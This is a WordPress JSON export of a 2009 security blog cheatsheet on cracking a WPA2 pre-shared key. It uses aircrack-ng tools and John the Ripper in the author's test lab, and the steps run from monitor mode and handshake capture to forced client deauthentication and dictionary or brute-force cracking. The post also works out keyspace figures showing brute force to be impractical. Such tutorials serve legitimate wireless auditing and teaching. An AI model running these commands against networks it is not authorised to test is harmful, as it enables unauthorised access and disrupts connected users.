{"id":1562,"date":"2009-02-24T13:29:41","date_gmt":"2009-02-24T11:29:41","guid":{"rendered":"http:\/\/www.corelan.be:8800\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/"},"modified":"2009-02-24T13:29:41","modified_gmt":"2009-02-24T11:29:41","slug":"cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper","status":"publish","type":"post","link":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/","title":{"rendered":"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper"},"content":{"rendered":"<p>Basic steps :<\/p>\n<ul>\n<li>Put interface in monitor mode <\/li>\n<li>Find wireless network (protected with WPA2 and a Pre Shared Key) <\/li>\n<li>Capture all packets <\/li>\n<li>Wait until you see a client and deauthenticate the client, so the handshake can be captured <\/li>\n<li>Crack the key using a dictionary file (or via John The Ripper) <\/li>\n<\/ul>\n<p>&#160;<\/p>\n<p>I\u2019ll use a Dlink DWL-G122 (USB) wireless network interface for this procedure.&#160; In backtrack4, this device is recognized as wlan0.<\/p>\n<p>First, put the card in monitor mode :<\/p>\n<div>\n<pre style=\"padding-right: 0px; padding-left: 0px; font-size: 8pt; padding-bottom: 0px; margin: 0em; overflow: visible; width: 100%; color: black; border-top-style: none; line-height: 12pt; padding-top: 0px; font-family: consolas, &#39;Courier New&#39;, courier, monospace; border-right-style: none; border-left-style: none; background-color: #f4f4f4; border-bottom-style: none\">root@bt:~# airmon-ng \n\nInterface       Chipset         Driver\n\nwifi0           Atheros         madwifi-ng\nath0            Atheros         madwifi-ng VAP (parent: wifi0)\nath1            Atheros         madwifi-ng VAP (parent: wifi0)\nwlan0           Ralink 2573 USB rt73usb - [phy0]\n\nroot@bt:~# airmon-ng start wlan0\n\nInterface       Chipset         Driver\n\nwifi0           Atheros         madwifi-ng\nath0            Atheros         madwifi-ng VAP (parent: wifi0)\nath1            Atheros         madwifi-ng VAP (parent: wifi0)\nwlan0           Ralink 2573 USB rt73usb - [phy0]\n                                (monitor mode enabled on mon0)<\/pre>\n<\/div>\n<p>Ok, we can now use interface mon0<\/p>\n<p>Let\u2019s find a wireless network that uses WPA2 \/ PSK :<\/p>\n<div>\n<pre style=\"padding-right: 0px; padding-left: 0px; font-size: 8pt; padding-bottom: 0px; margin: 0em; overflow: visible; width: 100%; color: black; border-top-style: none; line-height: 12pt; padding-top: 0px; font-family: consolas, &#39;Courier New&#39;, courier, monospace; border-right-style: none; border-left-style: none; background-color: #f4f4f4; border-bottom-style: none\">root@bt:~# airodump-ng mon0\n\n CH  6 ][ Elapsed: 4 s ][ 2009-02-21 12:57                                         \n                                                                                                                                   \n BSSID              PWR  Beacons    #Data, #\/s  CH  MB   ENC  CIPHER AUTH ESSID                                                    \n                                                                                                                                   \n 00:19:5B:52:AD:F7  -33        5        0    0  10  54   WPA2 CCMP   PSK  TestNet                                                  \n                                                                                                                                   \n BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                            \n                                                                                                                                    \n 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -29   0- 1     12        4  TestNet<\/pre>\n<\/div>\n<p>Stop airodump-ng and run it again, writing all packets to disk :<\/p>\n<div>\n<pre style=\"padding-right: 0px; padding-left: 0px; font-size: 8pt; padding-bottom: 0px; margin: 0em; overflow: visible; width: 100%; color: black; border-top-style: none; line-height: 12pt; padding-top: 0px; font-family: consolas, &#39;Courier New&#39;, courier, monospace; border-right-style: none; border-left-style: none; background-color: #f4f4f4; border-bottom-style: none\">airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w \/tmp\/wpa2<\/pre>\n<\/div>\n<p>At this point, you have 2 options : either wait until a client connects and the 4-way handshake is complete, or deauthenticate an existing client and thus force it to reassociate.&#160; Time is money, so let\u2019s force the deauthenticate. We need the bssid of the AP (-a) and the mac of a connected client (-c)<\/p>\n<div>\n<pre style=\"padding-right: 0px; padding-left: 0px; font-size: 8pt; padding-bottom: 0px; margin: 0em; overflow: visible; width: 100%; color: black; border-top-style: none; line-height: 12pt; padding-top: 0px; font-family: consolas, &#39;Courier New&#39;, courier, monospace; border-right-style: none; border-left-style: none; background-color: #f4f4f4; border-bottom-style: none\">root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0\n13:04:19  Waiting <span style=\"color: #0000ff\">for<\/span> beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10\n13:04:20  Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]<\/pre>\n<\/div>\n<p>As a result, airodump-ng should indicate \u201cWPA Handshake:\u201d in the upper right corner<\/p>\n<div>\n<pre style=\"padding-right: 0px; padding-left: 0px; font-size: 8pt; padding-bottom: 0px; margin: 0em; overflow: visible; width: 100%; color: black; border-top-style: none; line-height: 12pt; padding-top: 0px; font-family: consolas, &#39;Courier New&#39;, courier, monospace; border-right-style: none; border-left-style: none; background-color: #f4f4f4; border-bottom-style: none\"> CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7                                         \n                                                                                                                                   \n BSSID              PWR RXQ  Beacons    #Data, #\/s  CH  MB   ENC  CIPHER AUTH ESSID                                                \n                                                                                                                                   \n 00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54   WPA2 CCMP   PSK  TestNet                                              \n                                                                                                                                   \n BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                           \n                                                                                                                                   \n 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54      0      230 <\/pre>\n<\/div>\n<p>Stop airodump-ng and make sure the files were created properly<\/p>\n<div>\n<pre style=\"padding-right: 0px; padding-left: 0px; font-size: 8pt; padding-bottom: 0px; margin: 0em; overflow: visible; width: 100%; color: black; border-top-style: none; line-height: 12pt; padding-top: 0px; font-family: consolas, &#39;Courier New&#39;, courier, monospace; border-right-style: none; border-left-style: none; background-color: #f4f4f4; border-bottom-style: none\">root@bt:\/# ls \/tmp\/wpa2* -al\n-rw-r--r-- 1 root root 35189 2009-02-21 13:04 \/tmp\/wpa2-01.cap\n-rw-r--r-- 1 root root   476 2009-02-21 13:04 \/tmp\/wpa2-01.csv\n-rw-r--r-- 1 root root   590 2009-02-21 13:04 \/tmp\/wpa2-01.kismet.csv<\/pre>\n<\/div>\n<p>Form this point forward, you do not need to be anywhere near the wireless network. All cracking will happen offline, so you can stop airodump and other processes and even walk away from the AP. In fact, I would suggest to walk away and find yourself a cosy place where you can live, eat, sleep, etc\u2026. Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very very long time.&#160; There are 2 ways of bruteforcing : one that is relatively fast but does not guarantee success and one that is very slow, but guarantees that you will find the key at some point in time<\/p>\n<p>The first option is by using a worklist\/drstionary file.&#160; A lot of these files can be found on the internet (e.g. <a href=\"http:\/\/www.theargon.com\">www.theargon.com<\/a> or on packetstorm (see the archives)), or can be generated with tools such as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the worklist and feed it the .cap fie that contains the WPA2 Handshake. <\/p>\n<p>So if your wordlist is called word.lst (under \/tmp\/wordlists), you can run<\/p>\n<div>\n<pre style=\"padding-right: 0px; padding-left: 0px; font-size: 8pt; padding-bottom: 0px; margin: 0em; overflow: visible; width: 100%; color: black; border-top-style: none; line-height: 12pt; padding-top: 0px; font-family: consolas, &#39;Courier New&#39;, courier, monospace; border-right-style: none; border-left-style: none; background-color: #f4f4f4; border-bottom-style: none\">aircrack-ng \u2013w \/tmp\/wordlists\/word.lst -b 00:19:5B:52:AD:F7 \/tmp\/wpa2*.cap<\/pre>\n<\/div>\n<div>&#160;<\/div>\n<div>The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In other words, you may get lucky and get the key very fast, or you may not get the key at all.<\/div>\n<div>The second method (bruteforcing) will be successfull for sure, but it may take ages to complete. Keep in mind, a WPA2 key can be up to 64 characters, so in theory you would to build every password combination with all possible character sets and feed them into aircrack. If you want to use John The Ripper to create all possible password combinations and feed them into aircrack-ng, this is the command to use :<\/div>\n<div>&#160;<\/div>\n<div>\n<pre style=\"padding-right: 0px; padding-left: 0px; font-size: 8pt; padding-bottom: 0px; margin: 0em; overflow: visible; width: 100%; color: black; border-top-style: none; line-height: 12pt; padding-top: 0px; font-family: consolas, &#39;Courier New&#39;, courier, monospace; border-right-style: none; border-left-style: none; background-color: #f4f4f4; border-bottom-style: none\">root@bt:~# \/pentest\/password\/jtr\/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - \/tmp\/wpa2*.cap<\/pre>\n<\/div>\n<p>(Note : the PSK in my testlab is only 8 characters, contains one uppercase character and 4 numbers). I will post the output when the key was cracked, including the time it required to crack the key.<\/p>\n<p>That\u2019s it<\/p>\n<p>&#160;<\/p>\n<p>Update :after 20 hours of cracking, the key still has not been found.&#160; The system I\u2019m using to crack the keys is not very fast, but let\u2019s look at some facts :<\/p>\n<p>8 characters, plain characters (lowercase and uppercase) or digits = each character in the key could has 26+26+10 (62) possible combinations. So the maximum number of combinations that need to be checked in the bruteforce process is 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 =&#160; 218 340 105 584 896&#160;&#160;&#160;&#160;&#160; At about 600 keys per second on my \u201cslow\u201d system, it could take more than 101083382 hours to find the key&#160; (11539 year).&#160; I have stopped the cracking process as my machine is way too slow to crack the key while I\u2019m still alive\u2026&#160; So think about this when doing a WPA2 PSK Audit. <\/p>\n","protected":false},"excerpt":{"rendered":"<p>Basic steps : Put interface in monitor mode Find wireless network (protected with WPA2 and a Pre Shared Key) Capture all packets Wait until you see a client and deauthenticate the client, so the handshake can be captured Crack the key using a dictionary file (or via John The Ripper) &#160; I\u2019ll use a Dlink &hellip; <a href=\"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> \"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper\"<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[64,164,127],"tags":[3734,1512,1494,535,204,131],"class_list":["post-1562","post","type-post","status-publish","format-standard","hentry","category-linux","category-networking","category-security","tag-wpa-wpa2","tag-wireless","tag-aircrack","tag-encryption","tag-backtrack","tag-linux"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper - Corelan | Exploit Development &amp; Vulnerability Research<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper - Corelan | Exploit Development &amp; Vulnerability Research\" \/>\n<meta property=\"og:description\" content=\"Basic steps : Put interface in monitor mode Find wireless network (protected with WPA2 and a Pre Shared Key) Capture all packets Wait until you see a client and deauthenticate the client, so the handshake can be captured Crack the key using a dictionary file (or via John The Ripper) &#160; I\u2019ll use a Dlink &hellip; Continue reading &quot;Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper&quot;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/\" \/>\n<meta property=\"og:site_name\" content=\"Corelan | Exploit Development &amp; Vulnerability Research\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/corelanconsulting\" \/>\n<meta property=\"article:published_time\" content=\"2009-02-24T11:29:41+00:00\" \/>\n<meta name=\"author\" content=\"corelanc0d3r\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@corelanc0d3r\" \/>\n<meta name=\"twitter:site\" content=\"@corelanc0d3r\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"TechArticle\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2009\\\/02\\\/24\\\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2009\\\/02\\\/24\\\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\\\/\"},\"author\":{\"name\":\"corelanc0d3r\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/person\\\/3be5542b9b0a0787893db83a5ad68e8f\"},\"headline\":\"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper\",\"datePublished\":\"2009-02-24T11:29:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2009\\\/02\\\/24\\\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\\\/\"},\"wordCount\":651,\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"keywords\":[\"wpa wpa2\",\"wireless\",\"aircrack\",\"encryption\",\"backtrack\",\"Linux and Unix\"],\"articleSection\":[\"Linux and Unix\",\"Networking\",\"Security\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2009\\\/02\\\/24\\\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2009\\\/02\\\/24\\\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\\\/\",\"name\":\"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper - Corelan | Exploit Development &amp; Vulnerability Research\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\"},\"datePublished\":\"2009-02-24T11:29:41+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2009\\\/02\\\/24\\\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2009\\\/02\\\/24\\\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/2009\\\/02\\\/24\\\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.corelan.be\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#website\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"name\":\"Corelan CyberSecurity Research\",\"description\":\"Corelan publishes in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse engineering and security tooling used by professionals worldwide.\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.corelan.be\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#organization\",\"name\":\"Corelan CyberSecurity Research\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"contentUrl\":\"https:\\\/\\\/www.corelan.be\\\/wp-content\\\/uploads\\\/2026\\\/03\\\/corelanlogo2_small-20.png\",\"width\":200,\"height\":200,\"caption\":\"Corelan CyberSecurity Research\"},\"image\":{\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/corelanconsulting\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\",\"https:\\\/\\\/x.com\\\/corelanconsulting\",\"https:\\\/\\\/instagram.com\\\/corelanconsult\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.corelan.be\\\/#\\\/schema\\\/person\\\/3be5542b9b0a0787893db83a5ad68e8f\",\"name\":\"corelanc0d3r\",\"pronouns\":\"he\\\/him\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x\",\"caption\":\"corelanc0d3r\"},\"description\":\"Peter Van Eeckhoutte is the founder of Corelan and a globally recognized expert in exploit development and vulnerability research. With over two decades in IT security, he built Corelan into a respected platform for deep technical research, hands-on training, and knowledge sharing. Known for his influential exploit development tutorials, tools, and real-world training, Peter combines a strong research mindset with a passion for education\u2014helping security professionals understand not just how exploits work, but why.\",\"sameAs\":[\"https:\\\/\\\/www.corelan-training.com\",\"https:\\\/\\\/instagram.com\\\/corelanc0d3r\",\"https:\\\/\\\/www.linkedin.com\\\/in\\\/petervaneeckhoutte\\\/\",\"https:\\\/\\\/x.com\\\/corelanc0d3r\"],\"url\":\"https:\\\/\\\/www.corelan.be\\\/index.php\\\/author\\\/admin0\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper - Corelan | Exploit Development &amp; Vulnerability Research","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/","og_locale":"en_US","og_type":"article","og_title":"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper - Corelan | Exploit Development &amp; Vulnerability Research","og_description":"Basic steps : Put interface in monitor mode Find wireless network (protected with WPA2 and a Pre Shared Key) Capture all packets Wait until you see a client and deauthenticate the client, so the handshake can be captured Crack the key using a dictionary file (or via John The Ripper) &#160; I\u2019ll use a Dlink &hellip; Continue reading \"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper\"","og_url":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/","og_site_name":"Corelan | Exploit Development &amp; Vulnerability Research","article_publisher":"https:\/\/www.facebook.com\/corelanconsulting","article_published_time":"2009-02-24T11:29:41+00:00","author":"corelanc0d3r","twitter_card":"summary_large_image","twitter_creator":"@corelanc0d3r","twitter_site":"@corelanc0d3r","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"TechArticle","@id":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/#article","isPartOf":{"@id":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/"},"author":{"name":"corelanc0d3r","@id":"https:\/\/www.corelan.be\/#\/schema\/person\/3be5542b9b0a0787893db83a5ad68e8f"},"headline":"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper","datePublished":"2009-02-24T11:29:41+00:00","mainEntityOfPage":{"@id":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/"},"wordCount":651,"publisher":{"@id":"https:\/\/www.corelan.be\/#organization"},"keywords":["wpa wpa2","wireless","aircrack","encryption","backtrack","Linux and Unix"],"articleSection":["Linux and Unix","Networking","Security"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/","url":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/","name":"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper - Corelan | Exploit Development &amp; Vulnerability Research","isPartOf":{"@id":"https:\/\/www.corelan.be\/#website"},"datePublished":"2009-02-24T11:29:41+00:00","breadcrumb":{"@id":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.corelan.be\/index.php\/2009\/02\/24\/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.corelan.be\/"},{"@type":"ListItem","position":2,"name":"Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper"}]},{"@type":"WebSite","@id":"https:\/\/www.corelan.be\/#website","url":"https:\/\/www.corelan.be\/","name":"Corelan CyberSecurity Research","description":"Corelan publishes in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse engineering and security tooling used by professionals worldwide.","publisher":{"@id":"https:\/\/www.corelan.be\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.corelan.be\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.corelan.be\/#organization","name":"Corelan CyberSecurity Research","url":"https:\/\/www.corelan.be\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/","url":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","contentUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","width":200,"height":200,"caption":"Corelan CyberSecurity Research"},"image":{"@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/corelanconsulting","https:\/\/x.com\/corelanc0d3r","https:\/\/x.com\/corelanconsulting","https:\/\/instagram.com\/corelanconsult"]},{"@type":"Person","@id":"https:\/\/www.corelan.be\/#\/schema\/person\/3be5542b9b0a0787893db83a5ad68e8f","name":"corelanc0d3r","pronouns":"he\/him","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","url":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","caption":"corelanc0d3r"},"description":"Peter Van Eeckhoutte is the founder of Corelan and a globally recognized expert in exploit development and vulnerability research. With over two decades in IT security, he built Corelan into a respected platform for deep technical research, hands-on training, and knowledge sharing. Known for his influential exploit development tutorials, tools, and real-world training, Peter combines a strong research mindset with a passion for education\u2014helping security professionals understand not just how exploits work, but why.","sameAs":["https:\/\/www.corelan-training.com","https:\/\/instagram.com\/corelanc0d3r","https:\/\/www.linkedin.com\/in\/petervaneeckhoutte\/","https:\/\/x.com\/corelanc0d3r"],"url":"https:\/\/www.corelan.be\/index.php\/author\/admin0\/"}]}},"views":383386,"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts\/1562","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/comments?post=1562"}],"version-history":[{"count":0,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts\/1562\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/media?parent=1562"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/categories?post=1562"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/tags?post=1562"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}